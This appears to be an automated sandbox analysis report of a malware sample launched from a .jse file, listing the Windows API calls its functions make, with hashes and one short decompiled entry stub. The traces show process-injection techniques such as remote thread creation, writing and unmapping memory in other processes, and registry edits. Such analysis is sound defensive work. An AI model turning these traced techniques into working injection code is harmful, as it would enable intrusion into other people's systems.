Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 111post.exe Analysis ID: 66610

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	2E3FB8B38E59480ED8F47449A46E2082
Total matches:	37
Initial Analysis Report:	Open
Initial sample Analysis ID:	66610
Initial sample SHA 256:	74D71096AB1B39E13C4299E7A35A9809B0825E1F9ECD13D982A07F64092F4A7A
Initial sample name:	BK.485799485.jse

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

